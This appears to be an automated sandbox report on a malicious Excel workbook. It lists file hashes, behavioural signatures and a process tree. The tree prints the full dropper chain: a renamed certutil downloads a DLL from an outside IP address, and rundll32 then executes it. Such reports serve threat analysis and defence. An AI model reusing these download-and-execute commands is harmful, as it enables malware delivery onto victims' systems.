Analysis

  • max time kernel
    149s
  • max time network
    141s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    10-06-2021 19:14

General

  • Target

    cancel_sub_VCP1234567890123.xlsb

  • Size

    123KB

  • MD5

    9e1ee4a42c381eabcf2cde38a1aae7c9

  • SHA1

    015bb306d9e54001d433b3ac2e7212b864f54ae2

  • SHA256

    fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

  • SHA512

    d8955c76657c68542ebcd1fc0b14b69917976892a2005ff0fcace3754200d52c4557235e083b76f4115cc940281dbe77a8e390e8bd18fbe9d5cdb128191580ec

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process ⋅ 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Executes dropped EXE ⋅ 1 IoCs
  • Checks processor information in registry ⋅ 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry ⋅ 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener ⋅ 1 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 14 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:4268
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:692
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2128

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

          Execution

            Exfiltration

              Impact

                Initial Access

                  Lateral Movement

                    Persistence

                      Privilege Escalation

                        Replay Monitor

                        00:00 00:00

                        Downloads

                        • C:\ProgramData\TTObk2\TTObk2.dll
                          MD5

                          336d5ebc5436534e61d16e63ddfca327

                          SHA1

                          3bc15c8aae3e4124dd409035f32ea2fd6835efc9

                          SHA256

                          3973e022e93220f9212c18d0d0c543ae7c309e46640da93a4a0314de999f5112

                          SHA512

                          7c0b0d99a6e4c33cda0f6f63547f878f4dd9f486dfe5d0446ce004b1c0ff28f191ff86f5d5933d3614cceee6fbbdc17e658881d3a164dfa5d6f4c699b2126e3d

                        • C:\ProgramData\TTObk2\TTObk2.exe
                          MD5

                          056c7d065f4622da9cc2848f47e2bae2

                          SHA1

                          6c6f18b0ec53dc63488961c4240ec584ac71c25f

                          SHA256

                          e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                          SHA512

                          db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

                        • C:\programdata\TTObk2\TTObk2.exe
                          MD5

                          056c7d065f4622da9cc2848f47e2bae2

                          SHA1

                          6c6f18b0ec53dc63488961c4240ec584ac71c25f

                          SHA256

                          e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                          SHA512

                          db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

                        • memory/692-181-0x0000000000000000-mapping.dmp
                        • memory/1864-183-0x0000000000000000-mapping.dmp
                        • memory/2128-184-0x0000000000000000-mapping.dmp
                        • memory/4268-179-0x0000000000000000-mapping.dmp
                        • memory/4440-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
                        • memory/4440-123-0x00007FF9D3020000-0x00007FF9D4F15000-memory.dmp
                        • memory/4440-122-0x00007FF9D4F20000-0x00007FF9D600E000-memory.dmp
                        • memory/4440-121-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
                        • memory/4440-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
                        • memory/4440-114-0x00007FF66AA70000-0x00007FF66E026000-memory.dmp
                        • memory/4440-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
                        • memory/4440-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp